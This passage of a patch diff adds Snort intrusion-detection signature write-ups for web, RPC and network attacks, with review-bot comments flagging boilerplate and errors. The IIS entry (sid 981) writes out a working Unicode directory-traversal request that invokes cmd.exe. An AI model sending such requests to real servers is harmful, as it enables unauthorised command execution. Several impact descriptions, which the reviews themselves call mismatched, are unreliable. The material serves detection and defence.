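Review bot: the second and third Detailed Information paragraphs are generic CGI boilerplate ("does not perform stringent checks when validating the credentials of a client host") that does not describe this issue, which the first paragraph correctly identifies as an overflow triggered by a "From" field larger than 249 bytes in the MDaemon web mail form. The same boilerplate drives the Attack Scenarios text about supplying credentials, which is equally unrelated to an overflow. Suggest dropping both generic paragraphs and rewording Attack Scenarios around oversized form input. The Summary should name MDaemon rather than "a CGI web application", and Additional References is empty even though specific affected versions (6.5.2, 6.7.5, 6.7.9, 6.8.0 through 6.8.5) are listed; a vendor or Bugtraq reference should accompany them. "attackers choosing" needs an apostrophe (twice).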
--- /dev/null
+++ b/doc/signatures/100000566.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000566
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "XennoBB" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "tid" parameter in the "messages.php" script 
+used by the "XennoBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using XennoBB
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
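Review bot: as with the other cross-site scripting files in this patch, Impact ("Possible execution of arbitrary code of the attackers choosing") and the second Detailed Information paragraph ("execute system binaries") describe server compromise, while the issue via the "tid" parameter in messages.php is client-side script injection whose realistic consequence is the one Attack Scenarios gives: information stolen from a user who follows a malicious link. Suggest aligning Impact with that. Formatting: the Sid, Affected Systems and Contributors blocks are missing the blank line before "--", and "attackers choosing" needs an apostrophe.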
--- /dev/null
+++ b/doc/signatures/2428.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2428
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
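Review bot: Affected Systems reads "ISC INN 2.4 .0" with a stray space inside the version string; should be "2.4.0". Detailed Information says only that "a buffer overflow condition" exists without naming the NNTP command or code path involved, so the description cannot be matched against the rule's content; please add it. Corrective Action's second line "Apply the appropriate vendor supplied patches" is missing its period, Additional References is empty (with an extra blank line), and "attackers choosing" needs an apostrophe.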
--- /dev/null
+++ b/doc/signatures/100000490.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000490
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "trylogin.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"trylogin.php" script used by the "ISPConfig" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
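Review bot: the third Detailed Information paragraph and the Attack Scenarios text are credential-validation boilerplate ("access an authentication mechanism and supply his/her own credentials") that has nothing to do with a remote file include through the "go_info[isp][classes_root]" parameter of trylogin.php; suggest replacing them with one sentence stating that the parameter is used to make the script include and execute a file fetched from a remote host, which is what the first paragraph already says. Corrective Action could also mention the interpreter-level mitigation for this vulnerability class (PHP's allow_url_include and allow_url_fopen settings) alongside vendor patches. Wording: "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"), "running ona web server" is missing a space, and the Sid, Affected Systems and Contributors blocks lack the blank line before "--".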
--- /dev/null
+++ b/doc/signatures/1263.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1263
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) amountd (also known as autofsd) is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port amountd is using.  Attackers can also learn what versions of the amountd protocol are accepted by amountd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as amountd run.  The amountd RPC service is used by UNIX hosts to automatically mount and unmount autofs files.  It can use name service maps to find file systems to mount.  A vulnerability is present in autofsd that allows an attacker to execute arbitrary commands.  The attacker requests a map name that is executable followed by a malformed client key and commands execute.  The server improperly interprets the input and executes the commands.
+
+--
+Affected Systems:
+IBM AIX 4.3, SGI IRIX 6.2, 6.3, 6.4, 6.5, and 6.5.1.
+
+--
+Attack Scenarios:
+An attacker can craft an amountd request that executes arbitrary commands on the remote file system. 
+
+--
+Ease of Attack:
+Easy.  Exploit code is widely available.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access amountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for amountd, not probes of the amountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the amountd service itself. An attacker may attempt to go directly to the amountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Original rule modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/332/info/
+
+Arachnids:
+http://www.whitehats.com/info/IDS19
+
+
+--
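Review bot: Attack Scenarios says the crafted request "executes arbitrary commands on the remote file system"; commands execute on the remote host running amountd, not on a file system, and the sentence should say so. The Summary introduces two names ("amountd (also known as autofsd)") and the rest of the file alternates between them; settle on one and give the alias once. The False Positives entry ("If a legitimate remote user is allowed to access amountd, this rule may trigger") and the False Negatives note about attackers bypassing the portmapper are the kind of analyst-facing caveats the "None Known" files in this patch lack, so keep them. Formatting: doubled blank lines after the Summary and before the closing "--", and double spaces after periods throughout.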
--- /dev/null
+++ b/doc/signatures/100000362.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000362
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "rechnung.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "rechnung.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
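Review bot: the file opens with two blank lines before "Rule:", unlike the other signature files, and the third Detailed Information paragraph plus Attack Scenarios are generic credential-checking boilerplate that does not apply to a remote file include through "config[fsBase]" in rechnung.php; the first Detailed Information paragraph already states the actual mechanism and should be the only one kept. "an exploitation attempt has been attempted" is redundant, "running ona web server" is missing a space, and "attackers choosing" needs an apostrophe.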
--- /dev/null
+++ b/doc/signatures/2363.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2363
+
+--
+Summary:
+This event is generated when an attempt is made to access a file that
+has a known vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made access the file
+default_header.php used in the PHP application Cyboards. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Cyboards Cyboards PHP Lite 1.21
+	Cyboards Cyboards PHP Lite 1.25
+
+--
+Attack Scenarios:
+My manipulating certain variables contained in a PHP script an attacker
+may be able to supply code of their choosing and execute it on the
+server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
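Review bot: "My manipulating certain variables" in Attack Scenarios should be "By manipulating"; "an attempt is made access the file" is missing "to"; and the Affected Systems entries duplicate the vendor name ("Cyboards Cyboards PHP Lite 1.21", "Cyboards Cyboards PHP Lite 1.25"). The credential-validation boilerplate in Detailed Information does not fit the Attack Scenarios description of manipulating PHP variables in default_header.php to supply code; Detailed Information should describe that variable manipulation instead. The line ending "exploited by the attacker." is overlong, and "attackers choosing" needs an apostrophe (twice).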
--- /dev/null
+++ b/doc/signatures/981.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+981
+
+--
+Summary:
+This event is generated when an attempt is made use a unicode encoded representaion of a "/" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when unicode encoding of specific characters is used.  This particular attack uses the unicode encoding of the "/" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can unicode encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0084
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
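Review bot: the Summary "an attempt is made use a unicode encoded representaion" should read "an attempt is made to use a Unicode-encoded representation", and Impact "execute commands a vulnerable IIS server" is missing "on". Please cross-check the CVE reference before merging: the file cites candidate CAN-2000-0084 beside the MS00-078 bulletin, and the candidate number should be verified against that bulletin; CAN- identifiers have also since been renamed to CVE-. The sample request under Ease of Attack should be introduced with a short sentence saying it is the pattern the rule matches, since at present it sits unexplained after "Simple.". There is also a whitespace-only line after "Apply the patch referenced in the Microsoft link." that should be empty.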
--- /dev/null
+++ b/doc/signatures/966.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+966
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
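Review bot: this file does not say which FrontPage Server Extensions resource the rule keys on, and "the attack scenarios are legion" together with an empty Additional References leaves an analyst with nothing to pivot on when sid 966 fires. Please name the matched URI in the Summary or Detailed Information and add at least one reference; if the rule is intentionally broad, say so and reconsider whether legitimate FrontPage publishing traffic can trigger it, since False Positives currently says "None known". "attackers choosing" needs an apostrophe.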
--- /dev/null
+++ b/doc/signatures/270.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+270
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Teardrop 
+Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+Teardrop exploits a vulnerability in some TCP/IP stack implementations.
+
+The program sends a specially crafted fragmented packet where the first
+fragment has offset 0 and data length N and the second fragment has an
+offset less than N (The fragments overlap).  The resulting packet cannot
+be properly assembled.
+
+Systems may hang or crash.
+
+--
+Affected Systems:
+	Windows 95
+	Windows NT 4.0 SP3 and earlier
+	HP HPUX 10.34 and earlier
+	Linux kernels 2.0.31 and earlier
+	FreeBSD 3.0 prior to October 27, 1998
+
+--
+Attack Scenarios:
+The can be done remotely against any open UDP port using a spoofed
+address.
+
+--
+Ease of Attack:
+Simple. Tools are readily available and require little knowledge on the 
+part of the attacker.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches are available from all affected vendors.  Newer versions from
+each vendor are not vulnerable.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexanders@mccd.edu>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/124
+
+CERT:
+http://www.cert.org/advisories/CA-1997-28.html
+
+FreeBSD:
+ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/old/FreeBSD-SA-98:08.fragment.asc
+
+--
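Review bot: Attack Scenarios opens with "The can be done remotely", which should be "This can be done remotely". The Contributors line "Steven Alexander<alexanders@mccd.edu>" is missing the space before the address. The Detailed Information is the clearest in this patch (first fragment offset 0 and length N, second fragment offset less than N), but it describes overlapping fragments in general while the rule is named for Teardrop specifically; a sentence on how the rule distinguishes Teardrop from other overlap cases would support the False Positives entry, which currently says "None known".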
--- /dev/null
+++ b/doc/signatures/2459.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2459
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running starts a webcam or sends an invitation to view a webcam to another Yahoo IM user. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+This event indicates that a Yahoo IM user in your network is sending a notification that he or she is starting a webcam or offering an invitation to view the webcam.  While there are no known exploits associated with showing or viewing webcams, it is possible that this activity is inappropriate in certain environments.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No know attack scenarios.
+
+--
+Ease of Attack:
+No know attack scenarios.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
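Review bot: "No know attack scenarios" appears under both Attack Scenarios and Ease of Attack and should read "No known attack scenarios"; for a policy-violation rule, Ease of Attack should say "Not applicable" rather than repeat the Attack Scenarios text. The Contributors block and the "Additional References:" header are missing the blank line before the following line that the other files use. The False Negatives note that Yahoo IM traffic may use ports other than the expected defaults is useful and worth keeping.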
--- /dev/null
+++ b/doc/signatures/1309.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1309
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
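Review bot: apart from the Sid, this file is word-for-word the generic CGI text used for sid 850 earlier in this patch, so it gives no indication of what rule 1309 matches; please state the target script or URI and add a reference. Typos: "running ona web server" (missing space) and "attackers choosing" (apostrophe, twice); the line "relationships between the victim server and other hosts can be exploited by the attacker." is overlong.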
--- /dev/null
+++ b/doc/signatures/2212.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2212
+
+--
+Summary:
+This event is generated when an attempt is made to access imageFolio.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in BizDesign ImageFolio 3.01.
+
+--
+Impact:
+Remote execution of arbitrary code, possible session hijack.
+
+--
+Detailed Information:
+BizDesign ImageFolio 3.01 is a CGI-based web server application that manages image galleries. It contains a cross-site scripting vulnerability in imageFolio.cgi, where input is not properly validated. An attacker can craft a URL that, when executed by a legitimate user, runs with the security context of the web server. In this way, the attacker can obtain a legitimate user's session cookie, thereby posing as the user for the duration of the session.
+
+--
+Affected Systems:
+Any systems running BizDesign Image Folio version 3.0.1 or lower.
+
+--
+Attack Scenarios:
+An attacker crafts a URL that, when activated by a legitimate user, executes code that obtains the user's cookie on the user's computer with the security context of the web server. The attacker can then pose as the user for the duration of the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses imageFolio.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is unknown if this vulnerability has been fixed in ImageFolio 3.1. Contact the vendor, Bizdesign (http://www.bizdesign.com) for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/6265
+
+--
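Review bot: Impact says "Remote execution of arbitrary code" and Detailed Information says the crafted URL "runs with the security context of the web server", but for a cross-site scripting issue the injected script runs in the victim's browser within the site's origin, not on the server; the file's own conclusion (obtaining the user's session cookie and posing as the user for the duration of the session) is the accurate impact, so suggest restating Impact as session hijacking and information disclosure and dropping "security context of the web server". Version strings are inconsistent: the Summary and Detailed Information say ImageFolio 3.01 while Affected Systems says "version 3.0.1 or lower". Corrective Action ("It is unknown if this vulnerability has been fixed in ImageFolio 3.1") is a stale statement and should be re-verified or dated.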
--- /dev/null
+++ b/doc/signatures/100000480.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000480
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Somery" application running on a webserver. 
+Access to the file "team.php" using a remote file being passed as the 
+"checkauth" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "checkauth" parameter in the "team.php" script used by 
+the "Somery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Somery
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
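Review bot: the "Sid:" block omits the blank line before the following "--" separator (the "100000480" line is immediately followed by "--"), as do the "Affected Systems:" and "Contributors:" blocks, while every other section in the file is followed by a blank line; add the missing blank lines so all sections are delimited the same way. In Detailed Information, "running ona web server" should read "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". "Additional References:" is empty; if a reference for the Somery "team.php" / "checkauth" issue is available it belongs here.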
--- /dev/null
+++ b/doc/signatures/100000803.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000803
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "recent.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "recent.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
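Review bot: the file starts with two empty lines before "Rule:" (the first two "+" lines of the hunk are blank), unlike the sibling files that begin directly with "Rule:"; drop them. The "Sid:", "Affected Systems:" and "Contributors:" blocks lack the blank line before "--" that the other sections carry. Same typos as in the other remote file include descriptions: "running ona web server" in Detailed Information should be "running on a web server", and "attackers choosing" should be "attacker's choosing".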
--- /dev/null
+++ b/doc/signatures/1258.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1258
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
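Review bot: "arbitrary code of the attackers choosing" in the Impact section should be "attacker's choosing". The "Affected Systems:" entry is tab-indented here while the 1000004xx files in this patch leave the entries flush left; pick one convention for the set.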
--- /dev/null
+++ b/doc/signatures/1293.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid:
+1293
+
+--
+Summary: 
+This event is generated when traffic indicating Nimda worm activity is
+detected.
+
+--
+Impact:
+Possible infection by the Nimda virus.
+
+--
+Detailed Information:
+Nimda spreads by file infection, mass emailer, file share, or IIS unicode exploit 
+to attack unpatched systems.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows 2000
+
+--
+Attack Scenarios:
+An unpatched server is connected to the internet and is infected or
+an infected email is opened. Once infected the worm spreads itself.
+
+--
+Ease of Attack:
+Simple
+
